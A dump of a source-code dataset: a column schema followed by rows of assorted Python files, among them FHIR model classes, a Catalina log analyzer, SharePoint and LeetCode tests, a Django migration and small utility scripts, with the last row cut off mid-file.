blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
212ff7bb2d292acfcdecc48ba1e36050aa9e18ed
|
7b02411227428bb746e7622736dc006ee24ca925
|
/fhirclient/models/practitioner.py
|
a031183a9a28ca6bf7c19c5f0c4696218a018c6b
|
[] |
no_license
|
NCATS-Tangerine/CPKG
|
81c74abaec8de75ad769724e84d893dec117cf97
|
92b6079d61bdb975a0a4bc08879f56b686ff08ef
|
refs/heads/master
| 2022-12-10T17:55:52.586808
| 2019-08-20T20:19:56
| 2019-08-20T20:19:56
| 202,387,355
| 0
| 0
| null | 2022-12-08T06:01:57
| 2019-08-14T16:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 3,478
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.1.0-0931132380 (http://hl7.org/fhir/StructureDefinition/Practitioner) on 2019-08-06.
# 2019, SMART Health IT.
import sys
from dataclasses import dataclass
from typing import ClassVar, Optional, List
from .fhirabstractbase import empty_list
from .address import Address
from .attachment import Attachment
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .contactpoint import ContactPoint
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .humanname import HumanName
from .identifier import Identifier
from .period import Period
@dataclass
class PractitionerQualification(BackboneElement):
""" Certification, licenses, or training pertaining to the provision of care.
The official certifications, training, and licenses that authorize or
otherwise pertain to the provision of care by the practitioner. For
example, a medical license issued by a medical board authorizing the
practitioner to practice medicine within a certian locality.
"""
resource_type: ClassVar[str] = "PractitionerQualification"
identifier: Optional[List[Identifier]] = empty_list()
code: CodeableConcept = None
period: Optional[Period] = None
issuer: Optional[FHIRReference] = None
def elementProperties(self):
js = super(PractitionerQualification, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("code", "code", CodeableConcept, False, None, True),
("period", "period", Period, False, None, False),
("issuer", "issuer", FHIRReference, False, None, False),
])
return js
@dataclass
class Practitioner(DomainResource):
""" A person with a formal responsibility in the provisioning of healthcare or
related services.
A person who is directly or indirectly involved in the provisioning of
healthcare.
"""
resource_type: ClassVar[str] = "Practitioner"
identifier: Optional[List[Identifier]] = empty_list()
active: Optional[bool] = None
name: Optional[List[HumanName]] = empty_list()
telecom: Optional[List[ContactPoint]] = empty_list()
address: Optional[List[Address]] = empty_list()
gender: Optional[str] = None
birthDate: Optional[FHIRDate] = None
photo: Optional[List[Attachment]] = empty_list()
qualification: Optional[List[PractitionerQualification]] = empty_list()
communication: Optional[List[CodeableConcept]] = empty_list()
def elementProperties(self):
js = super(Practitioner, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("active", "active", bool, False, None, False),
("name", "name", HumanName, True, None, False),
("telecom", "telecom", ContactPoint, True, None, False),
("address", "address", Address, True, None, False),
("gender", "gender", str, False, None, False),
("birthDate", "birthDate", FHIRDate, False, None, False),
("photo", "photo", Attachment, True, None, False),
("qualification", "qualification", PractitionerQualification, True, None, False),
("communication", "communication", CodeableConcept, True, None, False),
])
return js
|
[
"solbrig@jhu.edu"
] |
solbrig@jhu.edu
|
b767dc6912417be37cab9363e2fe281e20c8e20d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_lookouts.py
|
435d7553390587072a7651b0c3278816d229a48a
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
from xai.brain.wordbase.nouns._lookout import _LOOKOUT
#calss header
class _LOOKOUTS(_LOOKOUT, ):
def __init__(self,):
_LOOKOUT.__init__(self)
self.name = "LOOKOUTS"
self.specie = 'nouns'
self.basic = "lookout"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
bb918660688b08138dfff3f921550e5811812b22
|
6ed01f4503fc9de234a561c945adff7cf4b1c81b
|
/dcsTools/logTools/LogAnalizer.py
|
b87902b91912124b60bb08ef9caa08a1222ab954
|
[] |
no_license
|
ostwald/python-lib
|
b851943c913a68424a05ce3c7b42878ff9519f68
|
9acd97ffaa2f57b3e9e632e1b75016549beb29e5
|
refs/heads/master
| 2021-10-28T06:33:34.156095
| 2021-10-21T23:54:49
| 2021-10-21T23:54:49
| 69,060,616
| 0
| 1
| null | 2018-06-21T16:05:30
| 2016-09-23T21:04:46
|
Roff
|
UTF-8
|
Python
| false
| false
| 2,332
|
py
|
"""
tool for analyzing catalina.out log files
e.g., "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
parses the log file and returns a list of Request objects
"""
import string
import sys
import os
import re
from time import strptime, strftime, gmtime, localtime, asctime, time, mktime
from Request import Request, logTimeToSecs
pat = re.compile ("\n\n")
def getRequests (path, filters=None):
"""
split the log file into "blobs" which are defined as chunks of text separated by a blank line
if the blob contains output from the RequestProcessor, create a Request object
optionally, a sessionID can be passed to look for Requests from that session only
"""
if type (filters) == type ("blah"):
filters = [filters]
s = open (path, 'r').read()
blobs = s.split ("\n\n")
print "processing %d blobs" % len (blobs)
requests = []
for blob in blobs:
line1 = blob.split("\n")[0]
if string.find (line1, "org.apache.struts.action.RequestProcessor process") != -1:
try:
request = Request (blob)
except:
print "failed to contstruct Request:", sys.exc_type, sys.exc_value
continue
if filters:
if (eval (string.join (filters, " and "))):
requests.append (request)
## accept = True
## for filter in filters:
## if not (eval (filter)):
## accept = False
## break
## if accept:
## requests.append (request)
else:
requests.append (request)
return requests
if __name__ == "__main__":
t1 = "Aug 12, 2005 12:00:01 AM"
t2 = "Aug 13, 2005 5:00:00 PM"
t1secs = logTimeToSecs (t1)
t2secs = logTimeToSecs (t2)
filters = None
path = "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
sessionId = "1DE5755F9DE662AD2D1615E23801027B"
filter1 = "request.sessionId == '%s'" % sessionId
filter2 = "request.time_stamp > %s and request.time_stamp < %s" % (t1secs, t2secs)
filter3 = "request.isStatusEvent()"
filters = (filter3,filter2)
requests = getRequests(path, filters)
if filters:
print "filters"
for f in filters:
print "\t" + f
print "%d requests extracted" % len (requests)
for i in range (min (len (requests), 10)):
print "\n-- %d / %d --\n%s" % ( i, len (requests), requests[i].log_entry)
## print "\n-- %d --%s" % ( i, requests[i].time_stamp)
|
[
"ostwald@ucar.edu"
] |
ostwald@ucar.edu
|
71d201020a8661345685b3fe0dcde8ba8c88b1f4
|
49ba5356bdc5df7dd9803b56fe507c5164a90716
|
/plus-one/test_solution.py
|
574ad18d65637674d36fc84b6ad97ac231f5ded6
|
[] |
no_license
|
uxlsl/leetcode_practice
|
d80ad481c9d8ee71cce0f3c66e98446ced149635
|
d8ed762d1005975f0de4f07760c9671195621c88
|
refs/heads/master
| 2021-04-25T18:12:28.136504
| 2020-03-11T07:54:15
| 2020-03-11T07:54:15
| 121,472,384
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 243
|
py
|
from solution import Solution
def test_solution():
s = Solution()
assert s.plusOne([1]) == [2]
assert s.plusOne([1, 2, 3]) == [1, 2, 4]
assert s.plusOne([1, 2, 9]) == [1, 3, 0]
assert s.plusOne([9, 9, 9]) == [1, 0, 0, 0]
|
[
"songlin.lin@yundata.com"
] |
songlin.lin@yundata.com
|
d4dcf28a56df6392227f886cba49f02edc0a4425
|
9152c6f5b692694c4cb95725319fc8dd21d30455
|
/tests/test_sharepoint_group.py
|
35ff7ddb18dd00b39d3d1f90d47262fff460b3cf
|
[
"MIT"
] |
permissive
|
VISIN9/Office365-REST-Python-Client
|
cf3de86a6bdd2461ff5814dbfa02d4d4185917d5
|
91c07d427a76197f6eb143c6253bdc832cbb889d
|
refs/heads/master
| 2021-05-25T08:43:35.530546
| 2020-04-06T20:24:53
| 2020-04-06T20:24:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,336
|
py
|
from tests.sharepoint_case import SPTestCase
class TestSharePointGroup(SPTestCase):
@classmethod
def setUpClass(cls):
super(TestSharePointGroup, cls).setUpClass()
cls.target_user_name = "i:0#.f|membership|mdoe@mediadev8.onmicrosoft.com"
target_group_name = "Communication site Visitors"
cls.target_group = cls.client.web.siteGroups.get_by_name(target_group_name)
def test1_get_current_user_groups(self):
groups = self.client.web.currentUser.groups
self.client.load(groups)
self.client.execute_query()
self.assertGreaterEqual(len(groups), 0)
def test2_add_user_to_group(self):
target_user = self.target_group.users.add_user(self.target_user_name)
self.client.execute_query()
self.assertIsNotNone(target_user.properties['Id'])
def test3_delete_user_from_group(self):
target_users = self.target_group.users
self.client.load(target_users)
self.client.execute_query()
users_count_before = len(target_users)
self.assertGreater(users_count_before, 0)
user_id = target_users[0].properties['Id']
target_users.remove_by_id(user_id)
self.client.load(target_users)
self.client.execute_query()
self.assertEqual(users_count_before, len(target_users) + 1)
|
[
"vvgrem@gmail.com"
] |
vvgrem@gmail.com
|
edee59048bf7db2a486cc4da27fba9608ec32e7a
|
909ae0ab0f4fe78de433c3d72b34b84848303ee8
|
/lending-club/venv/bin/jupyter-kernel
|
d0fe4631191e2897d3d90fd697e3b7c5e8f6b55c
|
[] |
no_license
|
jakekasan/data-science
|
f5cf2a7c0ead56e04a3549b930ca974495faae49
|
4bf589c268c517525abf3170c24cf42e0ae872cf
|
refs/heads/master
| 2021-09-17T21:18:51.278247
| 2018-07-05T07:31:51
| 2018-07-05T07:31:51
| 114,106,343
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
#!/Users/jakubkasan/coding/data-science/lending-club/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.kernelapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jake.kasan@gmail.com"
] |
jake.kasan@gmail.com
|
|
3278d42f28e4adebbe01bf582c688739941488df
|
8e95e79840005f6c34dfb978e8fe6e0ec4f7f643
|
/9_Introduction to PySpark_/33_Test vs Train.py
|
658938186f8e89f8ce821abc3d047cec0a15515f
|
[] |
no_license
|
Naysla/Machine_Learning
|
a0593cac41ef1561f14bec55780570b82fc37720
|
e75d5cd2894ccb005228ab3da87dde9025385a08
|
refs/heads/master
| 2023-02-01T17:19:32.413609
| 2020-12-22T20:36:45
| 2020-12-22T20:36:45
| 323,708,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
#Test vs Train
#After you've cleaned your data and gotten it ready for modeling, one of the most important steps is to split the data into a test set and a train set. After that, don't touch your test data until you think you have a good model! As you're building models and forming hypotheses, you can test them on your training data to get an idea of their performance.
#
#Once you've got your favorite model, you can see how well it predicts the new data in your test set. This never-before-seen data will give you a much more realistic idea of your model's performance in the real world when you're trying to predict or classify new data.
#
#In Spark it's important to make sure you split the data after all the transformations. This is because operations like StringIndexer don't always produce the same index even when given the same list of strings.
#
#Why is it important to use a test set in model evaluation?
By evaluating your model with a test set you can get a good idea of performance on new data.
#Exactly! A test set approximates the 'real world error' of your model.
|
[
"60472499+Naysla@users.noreply.github.com"
] |
60472499+Naysla@users.noreply.github.com
|
92694715d35c931f58ea9fdacff0c277bec3d3a8
|
5ffed81ced523b6e417b4e48d20380b6f16f8f42
|
/exam/football_souvenirs.py
|
867e2341fa443122f3abe1f9ea0b7f84ec5776db
|
[] |
no_license
|
Nikoletazl/Basics-Python
|
0f3f095bd51f9546c681e3cdd268232de88749ab
|
17aef1b95814f13a02053681aae3e617e56f2fe6
|
refs/heads/main
| 2023-08-14T15:48:48.450249
| 2021-10-08T15:02:35
| 2021-10-08T15:02:35
| 415,027,622
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,959
|
py
|
team = input()
souvenirs = input()
count_souvenirs = int(input())
if souvenirs == "flags":
if team == "Argentina":
price = count_souvenirs * 3.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 4.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 2.75
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 3.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "caps":
if team == "Argentina":
price = count_souvenirs * 7.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 8.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 6.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 6.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "posters":
if team == "Argentina":
price = count_souvenirs * 5.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 5.35
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 4.95
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 4.80
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "stickers":
if team == "Argentina":
price = count_souvenirs * 1.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 1.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 1.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 0.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
else:
print("Invalid stock!")
|
[
"noreply@github.com"
] |
Nikoletazl.noreply@github.com
|
132631fbc191c0d961db1e6783c48e19d8e8fd46
|
72d7cfbdd02f77300edb0f5e4104a1a147048ade
|
/djangoproject/myproject/users/migrations/0001_initial.py
|
e5e66726f68bb3366e771d7f04511d21d385f875
|
[] |
no_license
|
simrangrover5/batch430
|
33f3e59b7d2c70f87d796cc869855975ffef976a
|
ec841051d3a84cd56515aeff3b9d328cebea3705
|
refs/heads/master
| 2020-12-18T09:21:12.518412
| 2020-02-11T12:40:48
| 2020-02-11T12:40:48
| 235,325,192
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 608
|
py
|
# Generated by Django 3.0.1 on 2020-01-27 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Adduser',
fields=[
('username', models.CharField(max_length=100, unique=True)),
('email', models.EmailField(max_length=100, primary_key=True, serialize=False)),
('password', models.CharField(max_length=100)),
('pic', models.ImageField(upload_to='')),
],
),
]
|
[
"simrangrover5@gmail.com"
] |
simrangrover5@gmail.com
|
5ef8097cf66e2db0fa6b7d8d2d11a22a0d3f97e1
|
ce75bce747bf60b364bc2e516824fc69c64a7eec
|
/opengever/maintenance/scripts/archive/04_fix_ai_refnums.py
|
ede9e2ca2e686c1b7c72846ef4c543e7a57ffdfb
|
[] |
no_license
|
4teamwork/opengever.maintenance
|
c94e470af31f891d0969877533e5acd37369f70f
|
f2b9866fb6cce1d24e29b084b757eec857119479
|
refs/heads/master
| 2023-07-28T17:57:09.619138
| 2023-07-14T13:08:20
| 2023-07-14T13:08:20
| 14,493,557
| 2
| 0
| null | 2023-08-31T09:07:21
| 2013-11-18T13:46:30
|
Python
|
UTF-8
|
Python
| false
| false
| 6,511
|
py
|
from Acquisition import aq_inner
from Acquisition import aq_parent
from opengever.base.adapters import CHILD_REF_KEY
from opengever.base.adapters import DOSSIER_KEY
from opengever.base.adapters import PREFIX_REF_KEY
from opengever.base.adapters import REPOSITORY_FOLDER_KEY
from opengever.base.interfaces import IReferenceNumberFormatter
from opengever.base.interfaces import IReferenceNumberPrefix
from opengever.base.interfaces import IReferenceNumberSettings
from opengever.dossier.behaviors.dossier import IDossierMarker
from opengever.dossier.templatedossier import ITemplateDossier
from opengever.maintenance.debughelpers import setup_app
from opengever.maintenance.debughelpers import setup_plone
from opengever.repository.interfaces import IRepositoryFolder
from opengever.repository.repositoryroot import IRepositoryRoot
from opengever.task.task import ITask
from plone import api
from plone.registry.interfaces import IRegistry
from zope.annotation.interfaces import IAnnotations
from zope.app.intid.interfaces import IIntIds
from zope.component import getUtility
from zope.component import queryAdapter
import transaction
SEPARATOR = '-' * 78
class ReferenceNumberHelper(object):
"""Helper class for dealing with reference numbers.
"""
def __init__(self, log_func, site):
self.log = log_func
self.site = site
def get_repo_dossier_separator(self, obj=None):
registry = getUtility(IRegistry)
proxy = registry.forInterface(IReferenceNumberSettings)
formatter = queryAdapter(obj,
IReferenceNumberFormatter,
name=proxy.formatter)
return formatter.repository_dossier_seperator
def get_new_mapping(self, key, obj):
parent = aq_parent(aq_inner(obj))
ann = IAnnotations(parent)
if IDossierMarker.providedBy(obj):
mapping_base = ann.get(DOSSIER_KEY)
elif IRepositoryFolder.providedBy(obj) or IRepositoryRoot.providedBy(obj):
mapping_base = ann.get(REPOSITORY_FOLDER_KEY)
else:
raise Exception("Unknown object type!")
if not mapping_base:
return None
mapping = mapping_base.get(key)
return mapping
class ReferenceNumberFixer(object):
"""This is the fix for some previously run fixscripts.
It attempts to fix broken reference numbers. A new reference number has
been generated by mistake while moving content. Some fix-scrips have then
attempted to revert these reference numbers to their previous state. This
seems to have failed in come cases:
The reference numbers are now in an inconsistent state and have different
values in child_mapping and prefix_mapping. This script reverts the
reference numbers to the state as defined in child_mapping. If multiple
values are defined in child_mapping it takes the higher (later) one.
"""
def __init__(self, log_func, site):
self.catalog = api.portal.get_tool('portal_catalog')
self.parent_logger = log_func
self.site = site
self.helper = ReferenceNumberHelper(log_func, site)
self.intids = getUtility(IIntIds)
self.ignored_ids = ['vorlagen']
self.objs_to_reindex = set()
def log(self, msg):
msg = " " + msg
return self.parent_logger(msg)
def _fix_wrong_mappings(self, obj):
"""Detect the following errors:
- entry of reference number in prefix_mapping available
- no entry in child_mapping for that refernece numbers, but for
other (previous) reference numbers for that content object
"""
parent = aq_parent(aq_inner(obj))
local_number = IReferenceNumberPrefix(parent).get_number(obj)
intid = self.intids.getId(obj)
try:
child_mapping = self.helper.get_new_mapping(CHILD_REF_KEY, obj)
prefix_mapping = self.helper.get_new_mapping(PREFIX_REF_KEY, obj)
has_child_mapping = child_mapping.get(local_number) == intid
has_prefix_mapping = prefix_mapping.get(intid) == local_number
is_assigned_a_refnum = intid in set(child_mapping.values())
if not has_child_mapping:
if is_assigned_a_refnum:
self._revert_to_refnum_in_child_mapping(
obj, parent, local_number, intid, child_mapping, prefix_mapping)
else:
self.log("WARNING: obj %s not in child mapping of parent!" % obj)
if not has_prefix_mapping:
self.log("WARNING: obj %s not in prefix mapping of parent!" % obj)
except Exception, e:
self.log("WARNING: '%s' for %s" % (e, obj))
def _revert_to_refnum_in_child_mapping(self, obj, parent, local_number, intid, child_mapping, prefix_mapping):
previous_refnums = []
for key, value in child_mapping.iteritems():
if value == intid:
previous_refnums.append(key)
max_previous_refnum = unicode(max(map(int, previous_refnums)))
assert int(local_number) > int(max_previous_refnum)
# revert refnum to previous entry
prefix_mapping[intid] = max_previous_refnum
self.log("INFO: reverted %s (%s) from %s to %s" % (obj, intid, local_number, max_previous_refnum))
assert IReferenceNumberPrefix(parent).get_number(obj) == max_previous_refnum
for brain in self.catalog(path='/'.join(obj.getPhysicalPath())):
self.objs_to_reindex.add(brain.getObject())
def fix_child_mappings(self):
dossier_brains = self.catalog(object_provides=IDossierMarker.__identifier__)
for brain in dossier_brains:
obj = brain.getObject()
if ITemplateDossier.providedBy(obj):
continue
if obj.id in self.ignored_ids:
continue
self._fix_wrong_mappings(obj)
for obj in self.objs_to_reindex:
obj.reindexObject(idxs=['reference'])
if ITask.providedBy(obj):
obj.get_sql_object().sync_with(obj)
def main():
app = setup_app()
print SEPARATOR
plone = setup_plone(app, [])
# prevents erroneous execution
transaction.doom()
def log(msg):
print msg
fixer = ReferenceNumberFixer(log, plone)
print "Running 'fixing broken mappings'..."
fixer.fix_child_mappings()
print "Done"
if __name__ == '__main__':
main()
|
[
"david.erni@4teamwork.ch"
] |
david.erni@4teamwork.ch
|
ad5d1b7bda9bd683170c32f6da305b9a691513ef
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/ec_14270-1828/sdB_ec_14270-1828_lc.py
|
bdc07f94a156888a89f067ad64026758d3d61ea9
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[217.450125,-18.693147], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_ec_14270-1828/sdB_ec_14270-1828_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
7fc60fb3e6e5e97749994890220137591cb4ec56
|
51f6443116ef09aa91cca0ac91387c1ce9cb445a
|
/Curso_Python_3_UDEMY/banco_dados/incluir_contato.py
|
79c073a92c51debf70d449c7b8897597efd60f36
|
[
"MIT"
] |
permissive
|
DanilooSilva/Cursos_de_Python
|
f449f75bc586f7cb5a7e43000583a83fff942e53
|
8f167a4c6e16f01601e23b6f107578aa1454472d
|
refs/heads/main
| 2023-07-30T02:11:27.002831
| 2021-10-01T21:52:15
| 2021-10-01T21:52:15
| 331,683,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
py
|
from mysql.connector.errors import ProgrammingError
from db import nova_conexao
sql = 'INSERT INTO contatos (nome, tel) VALUES (%s, %s)'
args = ('Danilo', '94955-2951')
with nova_conexao() as conexao:
try:
cursor = conexao.cursor()
cursor.execute(sql, args)
conexao.commit()
except ProgrammingError as e:
print(f'Erro: {e.msg}')
else:
print('1 registro incluído, ID:', cursor.lastrowid)
|
[
"dno.gomesps@gmail.com"
] |
dno.gomesps@gmail.com
|
acb65fbacc27a8ad5009c305ffa87265cef993a0
|
be6d5ac1b415335cc7a27cf44e3afa041ef299e3
|
/1_3.py
|
764d33752a0c10e1a5835a028ea67466c05963df
|
[
"MIT"
] |
permissive
|
JeffreyAsuncion/PCEP_training_2020_12
|
4746a28f399c499e1bc2c3bf848ce0b05ad903bd
|
7477fb57a526ca0efdd156811aa72fae6129b062
|
refs/heads/main
| 2023-02-05T07:52:13.374651
| 2020-12-20T16:50:24
| 2020-12-20T16:50:24
| 319,857,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
print(2**3)
print(2**3.)
print(2.**3)
print(2.**3.)
print(5//2)
print(2**2**3)
print(2*4)
print(2**4)
print(2.*4)
print(2**4.)
print(2/4)
print(2//4)
print(-2/4)
print(-2//4)
print(2%4)
print(2%-4)
|
[
"jeffrey.l.asuncion@gmail.com"
] |
jeffrey.l.asuncion@gmail.com
|
4cc163174dd2cd27ea349f42f6823c5afed30126
|
fd41984178ffba0846fa7ab1f67c1a0843a5e3ff
|
/py2与py3的区别和测试/1.作业-文件的封装/dealFile.py
|
43f453b28ac890199b9c17686a9fc1aff0e8e72b
|
[] |
no_license
|
LasterSmithKim/Python-Base
|
23f17472ee80f7224e96a4185775c9cd05ac7a98
|
27756126d999ddabf53b6bdc7114903a297464a0
|
refs/heads/master
| 2020-03-28T08:00:11.156911
| 2018-11-28T09:54:51
| 2018-11-28T09:54:51
| 147,939,778
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,170
|
py
|
import csv
import sys
import importlib
importlib.reload(sys)
from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager,PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal,LAParams
from pdfminer.pdfinterp import PDFTextExtractionNotAllowed
class DealFile(object):
#读csv
def readCsv(self,path):
InfoList = []
with open(path, "r") as f:
allFileInfo = csv.reader(f)
print(allFileInfo)
for row in allFileInfo:
InfoList.append(row)
return InfoList
#写csv
#数据格式:[[1,2,3],[4,5,6],[7,8,9]]
def writeCsv(self,path, data):
with open(path, "w") as f:
writer = csv.writer(f)
for rowData in data:
writer.writerow(rowData)
#读取PDF
def readPDF(self,path, callback=None,toPath=""):
f = open(path, "rb")
parser = PDFParser(f)
pdfFile = PDFDocument()
parser.set_document(pdfFile)
pdfFile.set_parser(parser)
pdfFile.initialize()
if not pdfFile.is_extractable:
raise PDFTextExtractionNotAllowed
else:
manager = PDFResourceManager()
laparams = LAParams()
device = PDFPageAggregator(manager, laparams=laparams)
interpreter = PDFPageInterpreter(manager, device)
for page in pdfFile.get_pages():
interpreter.process_page(page)
layout = device.get_result()
for x in layout:
if (isinstance(x, LTTextBoxHorizontal)):
#处理每行数据
if toPath == "":
#处理每一行数据
str = x.get_text()
if callback != None:
callback(str)
else:
print(str)
else:
#写文件
print("将PDF文件写入文件:")
|
[
"kingone@yeah.net"
] |
kingone@yeah.net
|
39605e2d34194fa84b99d370e31e678f2bba6463
|
67929a76934c8c6bdacd573e2bc5ad6c0254d69c
|
/pyfusion/pyfusion/conf/utils.py
|
73bb7d253a04345383db0865cd7f7937bf7ccef3
|
[] |
no_license
|
SyntaxVoid/PyFusionDIIID
|
bc284b8480a8c4fc7881585c4fdd76ecc61162e4
|
4d19abed536f7b4d0322636828254ed3dd7a9b4c
|
refs/heads/master
| 2020-05-29T08:41:16.970539
| 2017-06-19T21:26:16
| 2017-06-19T21:26:16
| 69,825,057
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,471
|
py
|
""" Useful functions for manipulating config files."""
from ConfigParser import NoSectionError
import pyfusion
def CannotImportFromConfigError(Exception):
"""Failed to import a module, class or method from config setting."""
def import_from_str(string_value):
# TODO: make shortcuts for loading from within pyfusion
split_val = string_value.split('.')
val_module = __import__('.'.join(split_val[:-1]),
globals(), locals(),
[split_val[-1]])
return val_module.__dict__[split_val[-1]]
def import_setting(component, component_name, setting):
"""Attempt to import and return a config setting."""
value_str = pyfusion.config.pf_get(component, component_name, setting)
return import_from_str(value_str)
def kwarg_config_handler(component_type, component_name, **kwargs):
for config_var in pyfusion.config.pf_options(component_type, component_name):
if not config_var in kwargs.keys():
kwargs[config_var] = pyfusion.config.pf_get(component_type,
component_name, config_var)
return kwargs
def get_config_as_dict(component_type, component_name):
config_option_list = pyfusion.config.pf_options(component_type, component_name)
config_map = lambda x: (x, pyfusion.config.pf_get(component_type, component_name, x))
return dict(map(config_map, config_option_list))
def read_config(config_files):
"""Read config files.
Argument is either a single file object, or a list of filenames.
"""
try:
existing_database = pyfusion.config.get('global', 'database')
except NoSectionError:
existing_database = 'None'
try:
files_read = pyfusion.config.readfp(config_files)
except:
files_read = pyfusion.config.read(config_files)
if files_read != None: # readfp returns None
if len(files_read) == 0:
raise LookupError, str('failed to read config files from [%s]' %
(config_files))
config_database = pyfusion.config.get('global', 'database')
if config_database.lower() != existing_database.lower():
pyfusion.orm_manager.shutdown_orm()
if config_database.lower() != 'none':
pyfusion.orm_manager.load_orm()
def clear_config():
"""Clear pyfusion.config."""
import pyfusion
pyfusion.config = pyfusion.conf.PyfusionConfigParser()
|
[
